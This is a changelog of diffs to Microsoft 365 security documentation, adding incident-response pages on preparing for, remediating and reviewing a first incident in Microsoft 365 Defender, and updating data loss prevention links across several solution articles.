+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
security First Incident Post https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-post.md
+
+ Title: Step 3. Perform a post-incident review of your first incident
+description: How to perform a review of your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Step 3. Perform a post-incident review of your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+National Institute of Standards and Technology (NIST) recommends that once all steps have been taken to recover from the attack, organizations must review the incident to learn from it and learn and improve security posture or processes. Assessing the different aspects of incident-handling becomes important in preparing for the next incident.
+
+Microsoft 365 Defender can assist in performing post-incident activities by providing an organization with alerts that align with [MITRE ATT&CK Framework](https://attack.mitre.org/). All Microsoft Defender solutions label attacks in accordance with an ATT&CK tactic or technique.
+
+By mapping alerts to this industry framework, you can:
+
+- Conduct an analysis of gaps in security coverage.
+- Determine adversary and campaign attribution.
+- Perform trend analysis.
+- Identify skill gaps in attack method awareness.
+- Create a Power Automate Playbook for faster remediation.
+
+Post-incident review activity can also result in fine-tuning your security configuration and security team's processes, enhancing your organizationΓÇÖs response capabilities.
+
+## Next step
+
+See these additional investigation paths:
+
+- [Phishing email](first-incident-path-phishing.md)
+- [Identity-based attack](first-incident-path-identity.md)
++
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
security First Incident Prepare https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-prepare.md
+
+ Title: Prepare your security posture for your first incident
+description: Set up your Microsoft 365 tenant's security posture for your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Prepare your security posture for your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+Preparing for incident handling involves setting up sufficient protection of an organization's network from different kinds of security incidents. To reduce the risk of security incidents, National Institute of Standards and Technology (NIST) recommends several security practices including risk assessments, hardening host security, configuring networks securely, and preventing malware.
+
+Microsoft 365 Defender can help address several aspects of incident prevention:
+
+- Implementing a [Zero Trust](https://docs.microsoft.com/security/zero-trust/) framework
+- Determining your security posture by assigning a score with [Microsoft Secure Score](microsoft-secure-score.md)
+- Preventing threats through vulnerability assessments in [Threat and Vulnerability Management](../defender-endpoint/next-gen-threat-and-vuln-mgt.md)
+- Understanding the latest security threats so you can prepare for them
+
+## Step 1. Implement Zero Trust
+
+[Zero Trust](https://docs.microsoft.com/security/zero-trust/) is an integrated security philosophy and end-to-end strategy that considers the complex nature of any modern environment, including the mobile workforce and the users, devices, applications and data, wherever they may be located. By providing a single pane of glass to manage all endpoint detections in a consistent way, Microsoft 365 Defender can make it easier for your security operations team to implement the [guiding principles](https://docs.microsoft.com/security/zero-trust/#guiding-principles-of-zero-trust) of Zero Trust.
+
+Components of Microsoft 365 Defender can display violations of rules that have been implemented to establish Conditional Access policies for Zero Trust by integrating data from Microsoft Defender for Endpoint (MDE) or other mobile security vendors as an information source for device compliance policies and implementation of device-based Conditional Access policies.
+
+Device risk directly influences what resources will be accessible by the user of that device. The denial of access to resources based on certain criteria is the main theme of Zero Trust and Microsoft 365 Defender provides information needed to determine the trust level criteria. For example, Microsoft 365 Defender can provide the software version level of a device through the Threat and Vulnerability Management page while Conditional Access policies restrict devices that have outdated or vulnerable versions.
+
+Automation is a crucial part of implementing and maintaining a Zero Trust environment while also reducing the number of alerts that would potentially lead to incident response (IR) events. Components of Microsoft 365 Defender can be automated such as remediation actions (known as investigations for an incident in the Microsoft 365 security center), notification actions, and even the creation of support tickets such as in [ServiceNow](https://microsoft.service-now.com/sp/).
+
+## Step 2. Determine your organizationΓÇÖs security posture
+
+Next, organizations can use the [Microsoft Secure Score](microsoft-secure-score.md) in Microsoft 365 Defender to determine your current security posture and consider recommendations on how to improve it. The higher the score is, the more security recommendations and improvement actions have been taken by the organization. Secure Score recommendations can be taken across different products and allow organizations to raise their scores even higher.
+
+
+## Step 3. Assess your organizationΓÇÖs vulnerability exposure
+
+Preventing incidents can help streamline security operations efforts to focus on on-going critical and important security incidents. Software vulnerabilities are often a preventable entry point for attacks that can lead to data theft, data loss, or disruption of business operations. If no attacks are on-going, security operations must strive to achieve and maintain an acceptable level of [vulnerability exposure](../defender-endpoint/tvm-exposure-score.md) in their organization.
+
+To check your software patching progress, visit the [Threat and Vulnerability Management](../defender-endpoint/next-gen-threat-and-vuln-mgt.md) page in Defender for Endpoint, which you can access from Microsoft 365 Defender through the **More resources** tab.
+
+
+## 4. Understand emerging threats
+
+Use [threat analytics](threat-analytics.md) in the Microsoft 365 security center to keep up-to-date with the current security threat landscape. Expert Microsoft security researchers create reports that describe the latest cyber-threats in detail so you can understand how they might affect your Microsoft 365 subscription, devices, and users. These reports can include:
+
+- Active threat actors and their campaigns
+- Popular and new attack techniques
+- Critical vulnerabilities
+- Common attack surfaces
+- Prevalent malware
+
+You can implement the recommendations of an emerging threat to strengthen your security posture and minimize your attack surface area.
+
+Make time in your schedule to regularly check the [Threat Analytics](threat-analytics.md) section of the Microsoft 365 security center.
+
+## Next step
+
+[![Step 1: Learn how to triage and analyze incidents](../../medi)
+
+Learn how to [triage and analyze incidents](first-incident-analyze.md).
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
security First Incident Remediate https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/first-incident-remediate.md
+
+ Title: Step 2. Remediate your first incident
+description: How to get started in remediating your first incident in Microsoft 365 Defender.
+keywords: incidents, alerts, investigate, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
+search.product: eADQiWindows 10XVcnh
+ms.mktglfcycl: deploy
+ms.sitesec: library
+ms.pagetype: security
+f1.keywords:
+ - NOCSH
++
+localization_priority: Normal
+
+audience: ITPro
+
+ - M365-security-compliance
+ - m365initiative-m365-defender
+
+search.appverid:
+ - MOE150
+ - MET150
+ms.technology: m365d
+
+# Step 2. Remediate your first incident
++
+**Applies to:**
+- Microsoft 365 Defender
+
+Microsoft 365 Defender not only provides detection and analysis capabilities but also provides containment and eradication of malware. Containment includes steps to reduce the impact of the attack while eradication ensures all traces of attacker activity are removed from the network. Microsoft 365 Defender offers several remediation actions which can be configured to auto-remediate depending on your operating system and the attack type.
+
+Microsoft 365 Defender offers several remediation actions that analysts can manually initiate. Actions are separated into two categories, Actions on devices and Actions on files. Some actions can be used to immediately stop the threat while other actions assist in further forensic analysis.
+
+## Actions on devices
+
+- **Isolate the device** - This activity immediately blocks all network traffic (internet and internal) to minimize the spread of malware and allow analysts to continue analysis without a malicious actor being able to continue an attack. The only connection allowed is to the Microsoft Defender for Identity service cloud so Microsoft Defender for Identity can continue to monitor the device.
+- **Restrict app execution** - To restrict an application from running, a code integrity policy is applied that only allows files to run if they are signed by a Microsoft-issued certificate. This method of restriction can help prevent an attacker from controlling compromised devices and performing further malicious activities.
+- **Run Antivirus scan** - A Microsoft Defender Antivirus scan can run alongside other antivirus solutions, whether Defender Antivirus is the active antivirus solution or not. If another antivirus vendor product is the primary endpoint protection solution, you can run Defender Antivirus in Passive mode.
+- **Initiate automated investigation** - You can start a new general purpose automated investigation on the device. While an investigation is running, any other alert generated from the device will be added to an ongoing automated investigation until that investigation is completed. In addition, if the same threat is seen on other devices, those devices are added to the investigation.
+- **Initiate live response** - Live response is a capability that gives you instantaneous access to a device by using a remote shell connection. This gives you the ability to do in-depth investigative work and take immediate response actions to promptly contain identified threats in real time. Live response is designed to enhance investigations by enabling you to collect forensic data, run scripts, send suspicious entities for analysis, remediate threats, and proactively hunt for emerging threats.
+- **Collect investigation package** - As part of the investigation or response process, you can collect an investigation package from a device. By collecting the investigation package, you can identify the current state of the device and further understand the tools and techniques used by the attacker.
+- **Consult a threat expert** (available in both Actions on devices and files) - You can consult a Microsoft threat expert for more insights regarding potentially compromised devices or devices that are already compromised. Microsoft threat experts can be engaged directly from within the Microsoft Defender Security Center for a timely and accurate response.
+
+## Actions on files
+
+- **Stop and quarantine file** - This action includes stopping running processes, quarantining files, and deleting persistent data, such as any registry keys. This action takes effect on devices with Windows 10, version 1703 or later, where the file was observed in the last 30 days.
+- **Add indicators to block or allow file** - Prevent further propagation of an attack in your organization by banning potentially malicious files or suspected malware. This operation will prevent the file from being read, written, or executed on devices in your organization.
+- **Download or collect file** ΓÇô This action allows analysts to download a file in a password protected .zip archive file for further analysis by the organization.
+- **Deep analysis** ΓÇô This action executes a file in a secure, fully instrumented cloud environment. Deep analysis results show the file's activities, observed behaviors, and associated artifacts, such as dropped files, registry modifications, and communication with IP addresses.
+
+Continuing the example in [Detect, triage, and analyze incidents](first-incident-analyze.md#analyze-your-first-incident), an analyst can remediate this incident with these actions:
+
+1. Immediately reset the user account password
+2. Isolate the device in Microsoft 365 Defender until deep analysis is complete
+3. Ensure the malicious file was quarantined from SharePoint
+4. Check which endpoints were affected by malware
+5. Rebuild systems
+6. Check for similar Microsoft Cloud App Security alerts for other users
+7. Create a custom indicator in Microsoft Defender for Endpoint to block a Tor IP address
+8. Create a governance action in Microsoft Cloud App Security for this type of alert such as those shown in the following image:
+
+ :::image type="content" source="../../media/first-incident-remediate/first-incident-mcas-governance.png" alt-text="Example of governance actions in the Microsoft Cloud App Security portal":::
+
+Most of the remediation actions can be applied and tracked in Microsoft 365 Defender.
+
+## Using Playbooks
+
+In addition, automated remediation can be created using playbooks. Currently, Microsoft has [Playbook templates on GitHub](https://github.com/microsoft/Microsoft-Cloud-App-Security/tree/master/Playbooks) that provide playbooks for the following scenarios:
+
+- Remove sensitive file sharing after requesting user validation
+- Auto-triage infrequent country alerts
+- Request for manager action before disabling an account
+- Disable malicious inbox rules
+
+Playbooks use Power Automate to create custom robotic process automation flows to automate certain activities once specific criteria have been triggered. Organizations can create playbooks either from existing templates or from scratch.
+
+Here's an example.
+
+
+Playbooks can also be created during [post-incident review](first-incident-post.md) to create remediation actions from incidents for faster remediation actions.
+
+## Next step
+
+[![Step 3: Learn how to perform a post-incident review of an incident](../../medi)
+
+Learn how to [perform a post-incident review of an incident](first-incident-post.md).
+
+## See also
+
+- [Incidents overview](incidents-overview.md)
+- [Analyze incidents](investigate-incidents.md)
+- [Manage incidents](manage-incidents.md)
security Incidents Overview https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/incidents-overview.md
Title: Incidents in Microsoft 365 Defender description: Investigate incidents seen across devices, users, and mailboxes in the Microsoft 365 security center.
-keywords: incidents, alerts, investigate, analyze, response, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365
+keywords: incidents, alerts, investigate, analyze, response, correlation, attack, machines, devices, users, identities, identity, mailbox, email, 365, microsoft, m365, incident response, cyber-attack
search.product: eADQiWindows 10XVcnh ms.prod: m365-security ms.mktglfcycl: deploy
On an ongoing basis, identify the highest priority incidents for analysis and re
- [Managing](manage-incidents.md) incidents by modifying their title, assigning them to an analyst, and adding tags and comments. 1. For each incident, begin an [attack and alert analysis](investigate-incidents.md):-
+
a. View the summary of the incident to understand it's scope and severity and what entities are affected (the **Summary** tab). b. Begin analyzing the alerts to understand their origin, scope, and severity (the **Alerts** tab).
On an ongoing basis, identify the highest priority incidents for analysis and re
e. As needed, use information in the data set for the incident for more information (the **Evidence and Response** tab).
-2. After or during your analysis, address containment to reduce any additional impact of the attack and eradication of the security threat.
+2. After or during your analysis, perform containment to reduce any additional impact of the attack and eradication of the security threat.
3. As much as possible, recover from the attack by restoring your tenant resources to the state they were in before the incident.
On an ongoing basis, identify the highest priority incidents for analysis and re
- Recall the workflow you used to resolve the incident and update your standard workflows, processes, policies, and playbooks as needed. - Determine whether changes in your security configuration are needed and implement them.
+If you are new to security analysis, see the [introduction to responding to your first incident](incidents-overview.md) for additional information and to step through an example incident.
+ ## Example security operations for Microsoft 365 Defender Here's an example of security operations for Microsoft 365 Defender.
security Microsoft 365 Security Center Mdo https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender/microsoft-365-security-center-mdo.md
The Home page of the portal surfaces:
- Secure Score ratings - the number of users and devices at risk-- active incident lists
+- active incident queue
- lists of privileged OAuth apps - device health data - tweets from MicrosoftΓÇÖs security intelligence twitter feed
security Admin Submission https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/admin-submission.md
For other ways to submit email messages, URLs, and attachments to Microsoft, see
4. When you're finished, click the **Submit** button.
- ![URL submission example](../../media/submission-flyout-email.PNG)
+ ![New URL submission example](../../media/submission-flyout-email.PNG)
### Send a suspect URL to Microsoft
For other ways to submit email messages, URLs, and attachments to Microsoft, see
3. When you're finished, click the **Submit** button.
- ![Email submission example](../../media/submission-url-flyout.png)
+ ![New Email submission example](../../media/submission-url-flyout.png)
### Submit a suspected file to Microsoft
For other ways to submit email messages, URLs, and attachments to Microsoft, see
4. When you're finished, click the **Submit** button.
- ![Attachment submission example](../../media/submission-file-flyout.PNG)
+ ![New Attachment submission example](../../media/submission-file-flyout.PNG)
## View items Submitted for analysis
To change the filter criteria, click the **Submission ID** button and choose one
- **Submission type** - **Status**
-![Filter options for admin submissions](../../media/admin-submission-email-filter-options.png)
+![New Filter options for admin submissions](../../media/admin-submission-email-filter-options.png)
To export the results, click **Export** near the top of the page and select **Chart data** or **Table**. In the dialog that appears, save the .csv file.
To change the filter criteria, click the **Sender** button and choose one of the
- **Submission type** - **Sender IP**
-![Filter options for user submissions](../../media/user-submissions-filter-options.png)
+![New Filter options for user submissions](../../media/user-submissions-filter-options.png)
To export the results, click **Export** near the top of the page and select **Chart data** or **Table**. In the dialog that appears, save the .csv file.
Once a user submits a suspicious email to the custom mailbox, the user and admin
If you've configured the custom mailbox to intercept user-reported messages without sending the messages to Microsoft, you can find and send specific messages to Microsoft for analysis. This effectively moves a user submission to an admin submission.
-On the **Custom mailbox** tab, select a message in the list, click the **Action** button, and make one of the following selections:
+On the **User reported messages** tab, select a message in the list, click the **Action** button, and make one of the following selections:
- **Report clean** - **Report phishing** - **Report malware** - **Report spam**
-![Options on the Action button](../../media/user-submission-custom-mailbox-action-button.png)
+![New Options on the Action button](../../media/user-submission-custom-mailbox-action-button.png)
security Air Remediation Actions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-remediation-actions.md
- M365-security-compliance - m365initiative-defender-office365 description: "Learn about remediation actions following automated investigation in Microsoft Defender for Office 365." Previously updated : 02/09/2021 Last updated : 04/30/2021 - air ms.technology: mdo
Microsoft Defender for Office 365 includes remediation actions to address variou
|User|A user is sending malware/phish|Automated investigation does not result in a specific pending action. <p> The user might be reporting malware/phish, or someone could be [spoofing the user](anti-spoofing-protection.md) as part of an attack. Use [Threat Explorer](threat-explorer.md) to view and handle email containing [malware](threat-explorer-views.md#email--malware) or [phish](threat-explorer-views.md#email--phish).| |User|Email forwarding <br> (Mailbox forwarding rules are configured, which could be used for data exfiltrationΓÇï.)|Remove forwarding ruleΓÇï <p> Use [mail flow insights](mail-flow-insights-v2.md), including the [Autoforwarded messages report](mfi-auto-forwarded-messages-report.md), to view more specific details about forwarded email.| |User|Email delegation rulesΓÇï <br> (A user's account has delegation set up.)|Remove delegation ruleΓÇï <p> If your organization is using [Microsoft Defender for Endpoint](/windows/security/threat-protection/), consider [investigating the user](/microsoft-365/security/defender-endpoint/investigate-user) who's getting the delegation permission.ΓÇï|
-|User|Data exfiltration <br> (A user violated email or file-sharing [DLP policies](../../compliance/data-loss-prevention-policies.md).)|Automated investigation does not result in a specific pending action. <p> [View DLP reports and take action](../../compliance/view-the-dlp-reports.md).|
+|User|Data exfiltration <br> (A user violated email or file-sharing [DLP policies](../../compliance/dlp-learn-about-dlp.md) |Automated investigation does not result in a specific pending action. <p> [View DLP reports and take action](../../compliance/view-the-dlp-reports.md).|
|User|Anomalous email sending <br> (A user recently sent more email than during the previous 7-10 days.)|Automated investigation does not result in a specific pending action. <p> Sending a large volume of email isn't malicious by itself; the user might just have sent email to a large group of recipients for an event. To investigate, use [mail flow insights](mail-flow-insights-v2.md), including the [mail flow map report](mfi-mail-flow-map-report.md) to determine what's going on and take action.| ## Next steps
security Air View Investigation Results https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/air-view-investigation-results.md
The investigation status indicates the progress of the analysis and actions. As
|**Starting**|The investigation has been triggered and waiting to start runningΓÇï.| |**Running**|The investigation process has started and is underway. This state also occurs when [pending actions](air-review-approve-pending-completed-actions.md#approve-or-reject-pending-actions) are approved.| |**No Threats Found**|The investigation has finished and no threats (user account, email message, URL, or file) were identified. <p> **TIP**: If you suspect something was missed (such as a false negative), you can take action using [Threat Explorer](threat-explorer.md)ΓÇï.|
-|**Threats Found**|The automated investigation found issues, but there are no specific remediation actions to resolve those issues. <p> The **Threats Found** status can occur when some type of user activity was identified but no cleanup actions are available. Examples include any of the following user activities: <br/>- A [data loss prevention](../../compliance/data-loss-prevention-policies.md) (DLP) event<br/>- An email sending anomaly<br/>- Sent malware<br/>- Sent phish <p> The investigation found no malicious URLs, files, or email messages to remediate, and no mailbox activity to fix, such as turning off forwarding rules or delegation. <p> **TIP**: If you suspect something was missed (such as a false negative), you can investigate and take action using [Threat Explorer](threat-explorer.md)ΓÇï.|
+|**Threats Found**|The automated investigation found issues, but there are no specific remediation actions to resolve those issues. <p> The **Threats Found** status can occur when some type of user activity was identified but no cleanup actions are available. Examples include any of the following user activities: <br/>- A [data loss prevention](../../compliance/dlp-learn-about-dlp.md) event<br/>- An email sending anomaly<br/>- Sent malware<br/>- Sent phish <p> The investigation found no malicious URLs, files, or email messages to remediate, and no mailbox activity to fix, such as turning off forwarding rules or delegation. <p> **TIP**: If you suspect something was missed (such as a false negative), you can investigate and take action using [Threat Explorer](threat-explorer.md)ΓÇï.|
|**Terminated By System**|The investigation stopped. An investigation can stop for several reasons:ΓÇï <br/>- The investigation's pending actions expired. Pending actions time out after awaiting approval for one week.<br/>- There are too many actions. For example, if there are too many users clicking on malicious URLs, it can exceed the investigation's ability to run all the analyzers, so the investigation haltsΓÇï.<p> **TIP**: If an investigation halts before actions were taken, try using [Threat Explorer](threat-explorer.md) to find and address threats.| |**Pending Action**|The investigation has found a threat, such as a malicious email, a malicious URL, or a risky mailbox settingΓÇï, and an action to remediate that threat is [awaiting approval](air-review-approve-pending-completed-actions.md). <p> The **Pending Action** state is triggered when any threat with a corresponding action is found. However, the list of pending actions can increase as an investigation runs. View investigation details to see if other items are still pending completion.ΓÇï| |**Remediated**|The investigation finished and all remediation actions were approved (noted as fully remediated). <p> **NOTE**: Approved remediation actions can have errors that prevent the actions from being taken. Regardless of whether remediation actions are successfully completed, the investigation status does not change. View investigation details.ΓÇï|
solutions Best Practices Anonymous Sharing https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/best-practices-anonymous-sharing.md
To set the default file and folder sharing link for a specific site
## Prevent unauthenticated sharing of sensitive content
-You can use [data loss prevention (DLP)](../compliance/data-loss-prevention-policies.md) to prevent unauthenticated sharing of sensitive content. Data loss prevention can take action based on a file's sensitivity label, retention label, or sensitive information in the file itself.
+You can use [data loss prevention (DLP)](../compliance/dlp-learn-about-dlp.md) to prevent unauthenticated sharing of sensitive content. Data loss prevention can take action based on a file's sensitivity label, retention label, or sensitive information in the file itself.
To create a DLP rule 1. In the Microsoft 365 compliance admin center, go to the [Data loss prevention page](https://compliance.microsoft.com/datalossprevention).
solutions Configure Teams Baseline Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/configure-teams-baseline-protection.md
Microsoft 365 offers additional methods for securing your content. Consider if t
- Have guests agree to a [terms of use](/azure/active-directory/conditional-access/terms-of-use). - Configure a [session timeout policy](/azure/active-directory/conditional-access/howto-conditional-access-session-lifetime) for guests.-- Create [sensitive information types](../compliance/sensitive-information-type-learn-about.md) and use [data loss protection](../compliance/data-loss-prevention-policies.md) to set policies around accessing sensitive information.
+- Create [sensitive information types](../compliance/sensitive-information-type-learn-about.md) and use [data loss protection](../compliance/dlp-learn-about-dlp.md) to set policies around accessing sensitive information.
## See Also
solutions Create Secure Guest Sharing Environment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/create-secure-guest-sharing-environment.md
With the policy in place, when a user types "Project Saturn" into a document, th
## Create a DLP policy to remove guest access to highly sensitive files
-You can use [data loss prevention (DLP)](../compliance/data-loss-prevention-policies.md) to prevent unwanted guest sharing of sensitive content. Data loss prevention can take action based on a file's sensitivity label and remove guest access.
+You can use [data loss prevention (DLP)](../compliance/dlp-learn-about-dlp.md) to prevent unwanted guest sharing of sensitive content. Data loss prevention can take action based on a file's sensitivity label and remove guest access.
To create a DLP rule
solutions Deploy Threat Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/deploy-threat-protection.md
Title: Deploy threat protection capabilities across Microsoft 365 description: Get an overview of threat protection services and security capabilities in Microsoft 365 E5. Protect your user accounts, devices, email content, and more with Microsoft 365 E5.
-keywords: solution, setup, advanced threat protection, atp, security, microsoft 365 E5, protect devices, defender, m365
+keywords: microsoft threat protection, setup, advanced threat protection, security, microsoft 365 E5, protect devices, microsoft defender
solutions Financial Services Secure Collaboration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/financial-services-secure-collaboration.md
In addition, Microsoft provides "trainable classifiers" that use machine-learnin
Applying sensitivity labels to documents and emails embeds metadata that identifies the chosen sensitivity within the object. The sensitivity then travels with the data. So even if a labeled document is stored on a user's desktop or within an on-premises system, it's still protected. This functionality enables other Microsoft 365 solutions, such as Microsoft Cloud App Security or network edge devices, to identify sensitive data and automatically enforce security controls. Sensitivity labels have the added benefit of educating employees about which data within an organization is considered sensitive and how to handle that data when they receive it.
-**[Office 365 Data Loss Prevention (DLP)](../compliance/data-loss-prevention-policies.md?view=o365-worldwide)** automatically identifies documents, emails, and conversations that contain sensitive data by scanning them for sensitive data and then enforcing policy on those objects. Policies are enforced on documents in SharePoint and OneDrive for Business. They're also enforced when users send email, and in Teams chats and channel conversations. Policies can be configured to look for keywords, sensitive data types, retention labels, and whether data is shared within the organization or externally. Controls are provided to help organizations fine-tune DLP policies to reduce false positives. When sensitive data is found, customizable policy tips can be displayed to users within Microsoft 365 applications to inform them that their content contains sensitive data and then propose corrective actions. Policies can also prevent users from accessing documents, sharing documents, or sending emails that contain certain types of sensitive data. Microsoft 365 supports more than 100 built-in sensitive data types. Organizations can configure custom sensitive data types to meet their policies.
+**[Office 365 Data Loss Prevention (DLP)](../compliance/dlp-learn-about-dlp.md)** automatically identifies documents, emails, and conversations that contain sensitive data by scanning them for sensitive data and then enforcing policy on those objects. Policies are enforced on documents in SharePoint and OneDrive for Business. They're also enforced when users send email, and in Teams chats and channel conversations. Policies can be configured to look for keywords, sensitive data types, retention labels, and whether data is shared within the organization or externally. Controls are provided to help organizations fine-tune DLP policies to reduce false positives. When sensitive data is found, customizable policy tips can be displayed to users within Microsoft 365 applications to inform them that their content contains sensitive data and then propose corrective actions. Policies can also prevent users from accessing documents, sharing documents, or sending emails that contain certain types of sensitive data. Microsoft 365 supports more than 100 built-in sensitive data types. Organizations can configure custom sensitive data types to meet their policies.
Rolling out MIP and DLP policies to organizations requires careful planning and a user education program so that employees understand the organization's data classification schema and which types of data are considered sensitive. Providing employees with tools and educational programs that help them identify sensitive data and understand how to handle it makes them part of the solution for mitigating information security risks.
solutions Groups Teams Compliance Governance https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/groups-teams-compliance-governance.md
The following table provides a quick reference for the compliance controls avail
||Automatically classify sensitive content|[Apply a sensitivity label to content automatically](../compliance/apply-sensitivity-label-automatically.md)| ||Encrypt sensitive content|[Restrict access to content by using sensitivity labels to apply encryption](../compliance/encryption-sensitivity-labels.md)| |Information protection|||
-||Prevent the loss of sensitive information|[Overview of data loss prevention](../compliance/data-loss-prevention-policies.md)|
+||Prevent the loss of sensitive information|[Learn about data loss prevention](../compliance/dlp-learn-about-dlp.md)|
||Protect sensitive information in chat.|[Data loss prevention and Microsoft Teams](../compliance/dlp-microsoft-teams.md)| ||Define your organization's sensitive information|[Custom sensitive information types](../compliance/sensitive-information-type-learn-about.md)| |User segmentation|||
Additional resources:
DLP policies can prevent the accidental sharing of sensitive information across SharePoint, Exchange, and Teams. You can create policies that specify actions to take (such as blocking access) based on a set of rules. -- [Overview of data loss prevention](../compliance/data-loss-prevention-policies.md)
+- [Learn about data loss prevention](../compliance/dlp-learn-about-dlp.md)
DLP in Teams can help protect sensitive information in Teams chat and channel messages by deleting messages that contain sensitive information.
solutions Information Protection Deploy Protect Information https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/information-protection-deploy-protect-information.md
For data privacy within sites of concern, push sensitivity labels for automatic
## Data loss prevention
-You can use [data loss prevention (DLP)](../compliance/data-loss-prevention-policies.md) in Microsoft 365 to detect, warn, and block risky, inadvertent, or inappropriate sharing, such as sharing of data containing personal information, both internally and externally.
+You can use [data loss prevention (DLP)](../compliance/dlp-learn-about-dlp.md) in Microsoft 365 to detect, warn, and block risky, inadvertent, or inappropriate sharing, such as sharing of data containing personal information, both internally and externally.
DLP allows you to:
solutions Secure Teams Security Isolation https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/solutions/secure-teams-security-isolation.md
Microsoft 365 offers additional methods for securing your content. Consider if t
- Have your guests agree to a [terms of use](/azure/active-directory/conditional-access/terms-of-use). - Configure a [session timeout policy](/azure/active-directory/conditional-access/howto-conditional-access-session-lifetime) for guests.-- Create [sensitive information types](../compliance/sensitive-information-type-learn-about.md) and use [data loss protection](../compliance/data-loss-prevention-policies.md) to set policies around accessing sensitive information.
+- Create [sensitive information types](../compliance/sensitive-information-type-learn-about.md) and use [data loss protection](../compliance/dlp-learn-about-dlp.md) to set policies around accessing sensitive information.
- Use [Azure Active Directory access](/azure/active-directory/governance/access-reviews-overview) reviews to periodically review team access and membership. ## Drive user adoption for team members